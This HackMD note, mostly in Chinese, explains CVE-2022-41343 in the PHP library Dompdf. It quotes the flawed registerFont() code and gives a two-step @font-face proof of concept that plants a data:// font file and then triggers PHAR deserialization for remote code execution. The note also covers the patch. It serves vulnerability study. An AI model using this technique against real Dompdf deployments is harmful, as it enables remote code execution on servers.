Try   HackMD

CVE-2022-41343

tags: CVE Note MCL poc deserialize

registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.

affact Dompdf (, 2.0.1]

Abstract

Dompdf is a popular library in PHP used for rendering PDF files from HTML.

Background

Serialize(序列化)

將物件轉化為可以儲存與傳輸的格式,Ex: json, string

php 中的 serialize
python3 中的 json.dumps 與 pickle.dumps

Deserialize(反序列化)

將序列化後的資料轉回物件型態

php 中的 unserialize
python3 中的 json.loads 與 pickle.loads

但如果資料是可控的,有機會造成在 deserialize 回物件時呼叫 magic function,當 function 與 arguments 都可控的情況下會造成 RCE

  • php unserialize magic function
    • __toString()
      • Invoked when object is converted to a string. (by echo for example)
    • __destruct()
      • Invoked when an object is deleted. When no reference to the deserialised object instance exists, __destruct() is called.
    • __wakeup()
      • Invoked when an object is unserialised. automatically called upon object deserialisation.
    • __call()
      • will be called if the object attempts to call an inexistent function
  • python3 pickle magic function
    • __reduce__

PHAR(PHP Archive)

一種打包格式,是將 php code 與其他資源打包進 PHAR 文件中,當 php 解析此種文件時,會進行反序列化

Methology

CVE-2022-28368

DomPdf v1.2.1 CVE-2022-28368 曾揭露了一項 RCE 漏洞,成因是DomPdf 有個選項是允許使用者使用遠端的字型檔,若是有打開且引用了外部字型檔,會讓字型檔的 cache 留在 server 電腦中,但是他卻沒對字型的安全性做驗證,導致一項任意上傳的漏洞,而檔案會以 [font_name]_[font_weight]_[md5(src:url)].[ext] 這樣的形式存在於 /vendor/dompdf/dompdf/lib/fonts/

patch
patch 的方式是檔案尾巴加上.ttf

那還是可以任意上傳到 server,那如果我們上傳 phar:// 類型的檔案是不是就能 RCE ?

CVE-2021-3838

可惜在 CVE-2021-3838 中就已經先提出過這項問題了

Helpers::getFileContent() 下載文件之前,會先驗證 protocal 是否在 $allowedProtocols 裡面,如果檢查失敗,會記錄一條警告消息,並且 return 而不會處理該文件

code

    public function __construct(array $attributes = null)
    {
    ...
        $this->setAllowedProtocols(["file://", "http://", "https://"]);
    ...

CVE-2022-41343

但真的檢查下去卻發現,在 registerFont() 中卻缺少了錯誤的 return,代表說我們又能使用 phar://

FontMetrics.php

public function registerFont($style, $remoteFile, $context = null)
{
    $fontname = mb_strtolower($style["family"]);
    $families = $this->getFontFamilies();
    ...
    // Download the remote file
    [$protocol] = Helpers::explode_url($remoteFile);
    $allowed_protocols = $this->options->getAllowedProtocols();
    if (!array_key_exists($protocol, $allowed_protocols)) {
        Helpers::record_warnings(E_USER_WARNING, "Permission denied on $remoteFile. The communication protocol is not supported.", __FILE__, __LINE__);
    }

    foreach ($allowed_protocols[$protocol]["rules"] as $rule) {
        [$result, $message] = $rule($remoteFile);
        if ($result !== true) {
            // warning 卻沒 return
            Helpers::record_warnings(E_USER_WARNING, "Error loading $remoteFile: $message", __FILE__, __LINE__);
        }
    }
    // 那我們可以成功將指定 file 餵給 Helpers::getFileContent
    list($remoteFileContent, $http_response_header) = @Helpers::getFileContent($remoteFile, $context);
    if ($remoteFileContent === null) {
        return false;
    }
    ...

那我們接下來看 Helpers::getFileContents()

我們可以先觸發 Helpers::encodeURI 讓檔案存在 server 的 disk 中,再觸發 file_get_contents 將檔案 include 進去達成反序列化

Help.php

 public static function getFileContent($uri, $context = null, $offset = 0, $maxlen = null)
    {
        $content = null;
        $headers = null;
        [$protocol] = Helpers::explode_url($uri);
        $is_local_path = in_array(strtolower($protocol), ["", "file://", "phar://"], true);
        $can_use_curl = in_array(strtolower($protocol), ["http://", "https://"], true);

        set_error_handler([self::class, 'record_warnings']);

        try {
            if ($is_local_path || ini_get('allow_url_fopen') || !$can_use_curl) {
                // 第一步
                if ($is_local_path === false) {
                    $uri = Helpers::encodeURI($uri);
                }
                // 第二步
                if (isset($maxlen)) {
                    $result = file_get_contents($uri, false, $context, $offset, $maxlen);
                } else {
                    $result = file_get_contents($uri, false, $context, $offset);
                }
                if ($result !== false) {
                    $content = $result;
                }
                if (isset($http_response_header)) {
                    $headers = $http_response_header;
                }
  1. 利用 data:// 上傳
  2. 利用 phar:// 執行反序列化

Poc

<style>
@font-face {
    font-family:'exploit';
    src:url('data:text/plain;base64,double_url_encode([BASE64_POLYGLOT_TRUETYPE-PHAR])');
    font-weight:'normal';
    font-style:'normal';
}
</style>

<style>
@font-face {
    font-family:'exploit';
    src:url('phar://path/to/app/vendor/dompdf/dompdf/lib/fonts/exploit_normal_[md5(data:text/plain;base64,[BASE64_POLYGLOT_TRUETYPE-PHAR])].ttf##');
    font-weight:'normal';
    font-style:'normal';
}
</style>

Patch

加上 return false 就好了

Reference

CVE-2022-41343

Last changed by 
JyunD
0
296

Read more

PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE

JWT

Apr 11, 2024
Browser-Powered Desync Attacks

slide: https://hackmd.io/p/template-Talk-slide

Oct 3, 2023
從 SSRF 到 RCE 全紀錄

起因 意外翻到了某個客服網站有個疑似被惡意塞入的 ssrf 漏洞,抱持著嘗試找到新的洞的心態深入挖掘下去 Recon 對於新的一個網站,首先先用工具做滲透測試,主要使用工具為AWVS、ARL、各類型的子域名爆破工具、針對路徑做 fuzz 的工具,並掃描該 ip 所開啟的 protocol 有哪些可以利用。 將用子域名爆破工具掃出來的網站一一丟進AWVS、ARL掃描,其中比較關鍵的是找到一個 SSRF頁面,參數是url,看起來就是故意留的,先嘗試利用看看可以做到什麼樣的程度。 ssrf.php 有路徑可使用首先先試試 LFI,因為其攻擊最為簡單

Feb 21, 2023
CVE-2022-0847

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. :::info affact kernel [v5.8, fixed on v5.16.11, v5.15.25 and v5.10.102) ::: <small>以下 code 都是以 linux kernel v5.15.0 為例</small> Introduction 作者的公司有提供網頁伺服器服務,有一個建立 log 檔的系統,並且提供用戶下載來查看流量,有一天客戶跟他們反應,他們下載了網頁伺服器的日誌壓縮檔,進行解壓縮時,被解壓縮程式警告說 gzip 檔有 CRC 校驗的錯誤,作者想一想,就手動幫他的客戶修復這個 CRC 的問題,但一個月後,又發生了好多次,那錯誤的檔案一多,就可以檢查看看有沒有一個規律,發現每次都是發生在壓縮檔的結尾,就是檔案中 CRC 的位置,這個位置的值被蓋成了 zip 檔的檔頭,作者找了很久找不到問題,覺得這一定是 kernel bug。

Feb 11, 2023
Read more from JyunD
Published on HackMD